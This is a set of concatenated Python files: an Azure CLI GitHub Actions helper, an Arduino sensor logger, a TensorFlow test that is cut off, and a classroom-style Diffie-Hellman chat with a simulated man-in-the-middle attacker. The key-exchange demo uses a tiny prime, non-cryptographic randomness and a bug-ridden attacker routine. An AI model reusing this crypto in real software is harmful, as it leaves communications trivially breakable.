content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise CLIError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
if java_container_split and len(java_container_split) >= 2:
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise CLIError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise CLIError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise CLIError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(cmd, runtime_string, is_linux):
helper = _StackRuntimeHelper(cmd, linux=(is_linux), windows=(not is_linux))
matched_runtime = helper.resolve(runtime_string, is_linux)
if not matched_runtime:
return False
if matched_runtime.github_actions_properties:
return True
return False
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(cmd, app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
# TODO try and get better API support for windows stacks
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'dotnetcore':
app_runtime_version = '3.1'
app_runtime_version = ""
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux):
helper = _StackRuntimeHelper(cmd, linux=(is_linux), windows=(not is_linux))
if not is_linux:
matched_runtime = helper.resolve("{}|{}".format(app_runtime, app_runtime_version), is_linux)
else:
matched_runtime = helper.resolve(app_runtime, is_linux)
gh_props = None if not matched_runtime else matched_runtime.github_actions_properties
if gh_props:
if gh_props.get("github_actions_version"):
if is_linux:
return {
"display_name": app_runtime,
"github_actions_version": gh_props["github_actions_version"]
}
if gh_props.get("app_runtime_version").lower() == app_runtime_version.lower():
return {
"display_name": app_runtime,
"github_actions_version": gh_props["github_actions_version"]
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
from base64 import b64encode
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
|
diffie_hellman_key_exchange.py | import numpy as np
import hashlib as hl
import binascii
from Crypto.Cipher import AES
from base64 import b64encode
from base64 import b64decode
import json
import time
import threading
import os
prime_order_p = 16069
generator_g = 21
lock = threading.Lock()
# semaphore = threading.Semaphore()
# Given the generator g and prime order p, this function calculates the secret and
# the public key of the user.
# Namely, it randomly outputs a secret a, and calculates ga modulo p.
def generate_secret_and_g_a(g, p):
secret = np.random.randint(10, 70)
# y = (g ** secret) % p
y = pow(g, secret, p)
return y, secret
# Given the secret and the public key of the second party, the first party calculates its private key.
# The following function for calculation is just like the one before,
# ya modulo p = gab mod p.
def calculate_private_key(y, secret, p):
lock.acquire()
# pk = np.mod((np.power(y, secret)), p)
pk = (y ** secret) % p
lock.release()
return pk
def write_to_file(message: str, filename):
f = open(filename, "a")
f.write(str(message) + "\n")
f.close()
def append_fifteen_zeros_the_string(message: str):
return message + "000000000000000"
# Given the key, message and the filename, this function encrypts the message
# using AES-128 CTR encryption, with a random nonce.
# Then the function from Crypto.Cipher library encrypts the message and returns a
# nonce and a ciphertext.
# I wrote these two values to the file with comma separation.
def encrypt(key, message: str, filename):
data = bytes(message, encoding='utf-8')
cipher = AES.new(key, AES.MODE_CTR)
ct_bytes = cipher.encrypt(data)
nonce = b64encode(cipher.nonce).decode('utf-8')
ct = b64encode(ct_bytes).decode('utf-8')
ct_end_str = append_fifteen_zeros_the_string(ct)
# write_to_file(ct_end_str, filename)
result = json.dumps({'nonce': nonce, 'ciphertext': ct})
str = nonce + "," + ct_end_str
write_to_file(str, filename)
# print(result)
# print(str)
return result
# decrypt
# Takes the message written to the file and splits it into nonce and ciphertext.
# Next, it decrypts the message using these two parameters with AES-128 CTR mode.
# It then returns the plaintext.
def decrypt(username, message_input_from_file, key):
try:
# b64 = json.loads(json_input)
# nonce = b64decode(b64['nonce'])
# ct = b64decode(b64['ciphertext'])
message_input_from_file = message_input_from_file.split(",")
nonce = b64decode(message_input_from_file[0])
ct = b64decode(message_input_from_file[1][:-15])
cipher = AES.new(key, AES.MODE_CTR, nonce=nonce)
pt = cipher.decrypt(ct)
pt = bytes.decode(pt, encoding='utf-8')
print(username + " received the ciphertext, the message was:", pt)
return pt
except (ValueError, KeyError):
print("Incorrect decryption")
global K_ab_A
def get_user_input(file: str):
y_A, secret_a = generate_secret_and_g_a(generator_g, prime_order_p)
# Alice look if there is any. Else continue.
f = open(file, "a")
f.write(str(y_A) + "\n")
f.close()
# f = open(file, "r")
f = np.genfromtxt(file)
while f.size <= 1:
f = np.genfromtxt(file)
# TODO: Change to 10
time.sleep(10)
lock.acquire()
f = open(file, "r")
lines = f.readlines()
line = lines[1]
y_B = int(line.strip())
global K_ab_A
K_ab_A = pow(y_B, secret_a, prime_order_p)
# K_ab_A = calculate_private_key(y_B, secret_a, prime_order_p)
lock.release()
global K_ab_B
def user2(file: str):
# semaphore.acquire()
lock.acquire()
global K_ab_B
y_B, secret_b = generate_secret_and_g_a(generator_g, prime_order_p)
f = open(file, "a")
f.write(str(y_B) + "\n")
f.close()
# t1.join()
f = open(file, "r")
line = f.readline()
f.close()
y_A2 = int(line.strip())
# y_A2 = f[0]
K_ab_B = pow(y_A2, secret_b, prime_order_p)
lock.release()
# semaphore.release()
## Encrypted communication phase
# Unnecessary function.
def get_private_key(K_ab_A, K_ab_B):
if K_ab_A == K_ab_B:
hashed_string = hl.sha256(str(K_ab_A).encode('utf-8')).hexdigest()
key = binascii.unhexlify(hashed_string)
return key
# K_ab_A is the calculated private key, namely the g^ab mod p.
# This function returns the H(gab mod p) in an ascii form.
def user1_key(K_ab_A):
hashed_string = hl.sha256(str(K_ab_A).encode('utf-8')).hexdigest()
key = binascii.unhexlify(hashed_string)
return key
# K_ab_B is the calculated private key, namely the g^ab mod p.
# This function returns the H(gab mod p) in an ascii form.
def user2_key(K_ab_B):
hashed_string = hl.sha256(str(K_ab_B).encode('utf-8')).hexdigest()
key = binascii.unhexlify(hashed_string)
return key
def user_send_message(message: str, key, filename):
encrypted_message = encrypt(key, message, filename)
return encrypted_message
# key = get_private_key(K_ab_A, K_ab_B)
def communication_phase(username1, username2, K_ab_A, K_ab_B, filename):
input_from_user = " "
user1Key = user1_key(K_ab_A)
print(username1 + "'s key", user1Key)
user2Key = user2_key(K_ab_B)
print(username2 + "'s key", user2Key)
message_counter = 1
print("This conversation will go on until one of the parties input -1.")
while input_from_user != "-1":
input_from_user = input(username1 + "'s message:")
if input_from_user == "-1":
break
message_counter += 1
dummy = user_send_message(input_from_user, user1Key, filename)
encrypted_message = np.genfromtxt(filename, dtype="U")[message_counter]
if not encrypted_message:
time.sleep(10)
else:
# print("current_message", encrypted_message)
decrypt(username2, encrypted_message, user2Key)
input_from_user = input(username2 + "'s message:")
message_counter += 1
dummy = user_send_message(input_from_user, user2Key, filename)
encrypted_message = np.genfromtxt(filename, dtype="U")[message_counter]
if not encrypted_message:
time.sleep(10)
else:
decrypt(username1, encrypted_message, user1Key)
def attacker_communication_phase(username1, username2, K_ab_A1, K_ab_B1, K_ab_A2, K_ab_B2, file1, file2):
input_from_user = " "
attackerKey_first_party = user1_key(K_ab_A)
print("Attacker1's key with " + username1, attackerKey_first_party)
userKey_first_party = user2_key(K_ab_B)
print(username1 + "'s key", userKey_first_party)
attackerKey_second_party = user1_key(K_ab_A)
print("Attacker2's key with " + username2, attackerKey_second_party)
userKey_second_party = user2_key(K_ab_B)
print(username2 + "'s key", userKey_second_party)
message_counter_1 = 1
while input_from_user != "-1":
input_from_user = input(username1 + "'s message:")
if input_from_user == "-1":
break
message_counter_1 += 1
dummy = user_send_message(input_from_user, userKey_first_party, file1)
encrypted_message = np.genfromtxt(file1, dtype="U")[message_counter_1]
if not encrypted_message:
time.sleep(10)
else:
# print("current_message", encrypted_message)
decrypt("Attacker", encrypted_message, attackerKey_first_party)
# First, the message is taken from first party. Then encrypted with first party key.
# encrypted_message = user_send_message(input_from_user, userKey_first_party, file1)
# Then, the message is decrypted with attacker's key with first party.
# decrypt(encrypted_message, attackerKey_first_party)
# Then Attacker decides what to send to the second party.
input_from_user = input("The message that will be sent to other party:")
if input_from_user == "-1":
break
# Attacker encrypts his message with his own key.
dummy = user_send_message(input_from_user, attackerKey_second_party, file2)
encrypted_message = np.genfromtxt(file2, dtype="U")[message_counter_1]
if not encrypted_message:
time.sleep(10)
else:
# print("current_message", encrypted_message)
# The second party decrypts the message with their own key.
decrypt(username2, encrypted_message, userKey_second_party)
# encrypted_message = user_send_message(input_from_user, attackerKey_second_party, file2)
# decrypt(encrypted_message, userKey_second_party)
# All above steps now for the second party sending messages.
input_from_user = input(username2 + "'s message:")
if input_from_user == "-1":
break
message_counter_1 += 1
dummy = user_send_message(input_from_user, userKey_second_party, file2)
encrypted_message = np.genfromtxt(file2, dtype="U")[message_counter_1]
if not encrypted_message:
time.sleep(10)
else:
# print("current_message", encrypted_message)
decrypt("Attacker", encrypted_message, attackerKey_second_party)
# encrypted_message = user_send_message(input_from_user, userKey_second_party, file2)
# decrypt(encrypted_message, attackerKey_second_party)
input_from_user = input("The message that will be sent to other party:")
dummy = user_send_message(input_from_user, attackerKey_first_party, file1)
encrypted_message = np.genfromtxt(file1, dtype="U")[message_counter_1]
if not encrypted_message:
time.sleep(10)
else:
# Again attacker will decrypt the message from second party, with his key for second party.
decrypt(username1, encrypted_message, userKey_first_party)
# encrypted_message = user_send_message(input_from_user, attackerKey_first_party, file1)
# decrypt(encrypted_message, userKey_first_party)
# Cleaning the files before restart.
# f = open("Communication.txt", "w")
# f.close()
#
# username1 = input("Please enter username for user 1" + "\n")
# t1 = threading.Thread(target=get_user_input, args=("Communication.txt",))
# t1.start()
# t2 = threading.Thread(target=user2, args=("Communication.txt",))
# username2 = input("Please enter username for user 2" + "\n")
# t2.start()
# t2.join()
# t1.join()
# print("First Part Communication Phase")
# communication_phase(username1, username2, K_ab_A, K_ab_B, "Communication.txt")
# Unnecessary function
# def copy_files_into_A_and_B(file1, file2):
# with open("Communication.txt") as f:
# with open(file1, "w") as f1:
# for line in f:
# f1.write(line)
# with open("Communication.txt") as f:
# with open(file2, "w") as f2:
# for line in f:
# f2.write(line)
# Man in the middle
def man_in_the_middle(file1, file2):
# copy_files_into_A_and_B(file1, file2)
print("########################")
print("Man in the middle")
# For Alice.
attacker_username1 = input("Please enter username for Attacker for user 1" + "\n")
t1 = threading.Thread(target=get_user_input, args=(file1,))
t1.start()
t2 = threading.Thread(target=user2, args=(file1,))
username1 = input("Please enter username for user 1" + "\n")
t2.start()
t2.join()
t1.join()
global K_ab_A, K_ab_B
attacker_K_with_first_party = np.copy(K_ab_A)
first_party_K = np.copy(K_ab_B)
# First Alice got her keys with Attacker
# Now, Bob will get his keys with the Attacker.
attacker_username2 = input("Please enter username for Attacker for user 2" + "\n")
t1 = threading.Thread(target=get_user_input, args=(file2,))
t1.start()
t2 = threading.Thread(target=user2, args=(file2,))
username2 = input("Please enter username for user 2" + "\n")
t2.start()
t2.join()
t1.join()
attacker_K_with_second_party = np.copy(K_ab_A)
second_party_K = np.copy(K_ab_B)
# First with alice
print("Man in the Middle Communication Phase")
attacker_communication_phase(username1, username2, attacker_K_with_first_party, first_party_K,
attacker_K_with_second_party, second_party_K, file1, file2)
# file1 = "Communication_A.txt"
# file2 = "Communication_B.txt"
# # Cleaning the files before restart.
# f = open(file1, "w")
# f.close()
# f = open(file2, "w")
# f.close()
# man_in_the_middle(file1, file2)
# The above part was single-file implementation.
# Two separate file implementation:
def get_user_input2(file: str, y_A, secret_a, sleep_time):
f = np.genfromtxt(file)
while f.size <= 1:
f = np.genfromtxt(file)
print("Waiting for the second party to enter!")
time.sleep(sleep_time)
lock.acquire()
f = np.genfromtxt(file)
index = np.where(f == y_A)[0][0]
is_first_user = index == 0
index = 0
for i in f:
if i != y_A:
y_B = int(i)
break
# f = open(file, "r")
# lines = f.readlines()
# line = lines[1]
# y_B = int(line.strip())
private_key = pow(y_B, secret_a, prime_order_p)
# K_ab_A = calculate_private_key(y_B, secret_a, prime_order_p)
lock.release()
return private_key, is_first_user
def communication_phase_multiple_files(username, hashed_private_key, is_first_user, file, sleep_time):
input_from_user = ""
pt = ""
size = 2
while input_from_user != "-1" or pt != "-1":
if is_first_user:
input_from_user = input(username + "'s message:")
# Write message to the file.
dummy = user_send_message(input_from_user, hashed_private_key, file)
if input_from_user == "-1":
break
# Get the next message from second party.
f = np.genfromtxt(file, dtype="U")
size += 1
while f.size <= size:
f = np.genfromtxt(file)
time.sleep(sleep_time)
print("Waiting for the other party to send a message!")
encrypted_message = np.genfromtxt(file, dtype="U")[size]
if not encrypted_message:
time.sleep(sleep_time)
else:
pt = decrypt(username, encrypted_message, hashed_private_key)
size += 1
else:
f = np.genfromtxt(file, dtype="U")
while f.size == size:
f = np.genfromtxt(file)
print("Waiting for other party")
time.sleep(sleep_time)
encrypted_message = np.genfromtxt(file, dtype="U")[size]
if not encrypted_message:
time.sleep(sleep_time)
else:
# print("current_message", encrypted_message)
pt = decrypt(username, encrypted_message, hashed_private_key)
if pt == "-1":
break
size += 1
input_from_user = input(username + "'s message:")
dummy = user_send_message(input_from_user, hashed_private_key, file)
size += 1
sleep_time = 10
def part1():
filename = "Communication.txt"
if not os.path.isfile(filename):
f = open(filename, "w")
f.close()
# Cleaning the files before restart.
# f = open(filename, "w")
# f.close()
username = input("Please enter username" + "\n")
# username = "A"
y, secret = generate_secret_and_g_a(generator_g, prime_order_p)
command = ""
while command != "init":
command = input("Please enter init to start." + "\n")
if command == "init":
break
write_to_file(str(y), filename)
private_key, is_first_user = get_user_input2(filename, y, secret, sleep_time)
# print("is_first?", is_first_user)
userKey = user1_key(private_key)
print(username + "'s hashed key:", userKey)
communication_phase_multiple_files(username, userKey, is_first_user, filename, sleep_time)
# part1()
# Man in the middle part - Multiple Files
file1 = "Communication_A.txt"
file2 = "Communication_B.txt"
# Cleaning the files before restart.
# f = open(file1, "w")
# f.close()
# f = open(file2, "w")
# f.close()
def part2():
print("################################")
print("Man in the middle part")
username = input("Please enter username" + "\n")
# username = "A"
y, secret = generate_secret_and_g_a(generator_g, prime_order_p)
command = ""
while command != "init":
command = input("Please enter init to start." + "\n")
if command == "init":
break
f = np.genfromtxt(file1)
if f.size == 0:
file = file1
else:
file = file2
write_to_file(str(y), file)
private_key, is_first_user = get_user_input2(file, y, secret, sleep_time)
userKey = user1_key(private_key)
print(username + "'s hashed key:", userKey)
communication_phase_multiple_files(username, userKey, is_first_user, file, sleep_time)
# part2()
|
dataHistory.py | import json
from datetime import datetime
import time
import threading
from os.path import exists
from smbus import SMBus
import struct
# Address of the Arduino 1 - Adresse de l'Arduino 1
ARDUINO1_I2C_ADDRESS = 18
class BackgroundHistory(object):
def __init__(self,interval = 10,number_elements = 10):
self.interval = interval
self.number_elements = number_elements
self.elements = []
self.read()
thread = threading.Thread(target = self.run)
thread.daemon = True
thread.start()
def run(self):
while True:
bus = SMBus(1)
i2c_data1 = bus.read_i2c_block_data(ARDUINO1_I2C_ADDRESS,0)
humidity, temperature = struct.unpack("ff", struct.pack("B"*8,*i2c_data1[0:8]))
bus.close()
data = {"timestamp" : str(datetime.now()),
"humidity" : humidity,
"temperature" : temperature}
with open("dataHistory.json","a+") as f:
f.write(json.dumps(data) + "\n")
self.elements.append(data)
if len(self.elements) > self.number_elements:
self.elements.pop(0)
time.sleep(self.interval)
def read(self):
if exists("dataHistory.json"):
for line in open("dataHistory.json","r"):
try:
data = json.loads(line.strip())
self.elements.append(data)
except:
pass
if len(self.elements) > self.number_elements:
self.elements.pop(0)
def get_elements(self):
return self.elements |
variable_scope_shim_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
from absl.testing import parameterized
from keras import combinations
from keras import regularizers
from keras.engine import input_layer as input_layer_module
from keras.engine import training as training_module
from keras.layers import core
from keras.legacy_tf_layers import core as core_layers
from keras.legacy_tf_layers import variable_scope_shim
import numpy
import tensorflow.compat.v2 as tf
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
from tensorflow.python.ops import variable_scope # pylint: disable=g-direct-tensorflow-import
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
In graph mode, we just execute the graph_function passed as argument. In eager
mode, we wrap the function using wrap_function and then execute the wrapped
result.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
"""
def wrap_and_execute(self):
store = variable_scope_shim._EagerVariableStore()
with variable_scope.with_variable_store(store):
# use the original function
graph_function(self)
return wrap_and_execute
class VariableScopeTest(tf.test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertIs(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertIs(v, v1)
self.assertIsNot(v, vs.get_variable("u", [1], reuse=False))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set(v.name for v in vs._vars.values()))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = tf.compat.v1.constant_initializer(0.3)
with tf.compat.v1.variable_scope("tower0") as tower:
with tf.compat.v1.variable_scope("foo", initializer=init):
v = tf.compat.v1.get_variable("v", [])
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with tf.compat.v1.variable_scope(tower, initializer=init):
w = tf.compat.v1.get_variable("w", [])
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with tf.compat.v1.variable_scope("tower1") as tower:
with tf.compat.v1.variable_scope("foo", constraint=constraint):
v = tf.compat.v1.get_variable("v", [])
self.assertIsNotNone(v.constraint)
with tf.compat.v1.variable_scope(tower, constraint=constraint):
w = tf.compat.v1.get_variable("w", [])
self.assertIsNotNone(w.constraint)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with tf.compat.v1.variable_scope("tower2") as tower:
with tf.compat.v1.variable_scope("foo", dtype=tf.float16):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, tf.float16)
with tf.compat.v1.variable_scope(tower, dtype=tf.float16):
w = tf.compat.v1.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, tf.float16)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitFromNonTensorValue(self):
v = tf.compat.v1.get_variable("v4", initializer=4, dtype=tf.int32)
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = tf.compat.v1.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=tf.int64)
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if tf.executing_eagerly() else TypeError
with self.assertRaises(error):
tf.compat.v1.get_variable("x4", initializer={})
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitFromNonInitializer(self):
# Test various dtypes with zeros initializer as following:
types = [
tf.int8, tf.uint8, tf.int16, tf.uint16, tf.int32,
tf.int64, tf.bool
]
# Use different variable_name to distinguish various dtypes
for (i, dtype) in enumerate(types):
x = tf.compat.v1.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = tf.compat.v1.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=tf.compat.v1.zeros_initializer(dtype=dtype))
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeRegularizer(self):
init = tf.compat.v1.constant_initializer(0.3)
def regularizer1(v):
return tf.reduce_mean(v) + 0.1
def regularizer2(v):
return tf.reduce_mean(v) + 0.2
with tf.compat.v1.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with tf.compat.v1.variable_scope("foo", initializer=init):
v = tf.compat.v1.get_variable("v", [])
self.evaluate(tf.compat.v1.variables_initializer([v]))
with tf.compat.v1.variable_scope(tower, initializer=init) as vs:
tf.compat.v1.get_variable("u", [])
vs.set_regularizer(regularizer2)
tf.compat.v1.get_variable("w", [])
# Next 3 variable not regularized to test disabling regularization.
tf.compat.v1.get_variable(
"x", [], regularizer=tf.compat.v1.no_regularizer)
with tf.compat.v1.variable_scope(
"baz", regularizer=tf.compat.v1.no_regularizer):
tf.compat.v1.get_variable("y", [])
vs.set_regularizer(tf.compat.v1.no_regularizer)
tf.compat.v1.get_variable("z", [])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitializeFromValue(self):
init = tf.constant(0.1)
w = tf.compat.v1.get_variable("v", initializer=init)
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegex(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
tf.compat.v1.get_variable("u", [1], initializer=init)
with tf.compat.v1.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = tf.compat.v1.get_variable("v")
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = tf.constant(1, dtype=tf.int32)
t = tf.compat.v1.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, tf.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegex(ValueError, "don't match"):
tf.compat.v1.get_variable("s", initializer=init, dtype=tf.float64)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = tf.constant(value)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=tf.compat.v1.AUTO_REUSE):
_ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=tf.compat.v1.AUTO_REUSE):
_ = tf.compat.v1.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuseIgnoreFalse(self):
with self.cached_session():
def test_value(value):
x = tf.constant(value)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=False):
_ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
# We need to ignore reuse=False in the shim, because the
# code is expected to get rerun each time the user calls the shim.
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=False):
_ = tf.compat.v1.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScope(self):
with self.cached_session():
with tf.name_scope("testVarOpScope1"):
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "tower/w:0")
with tf.name_scope("testVarOpScope2"):
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default_1/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
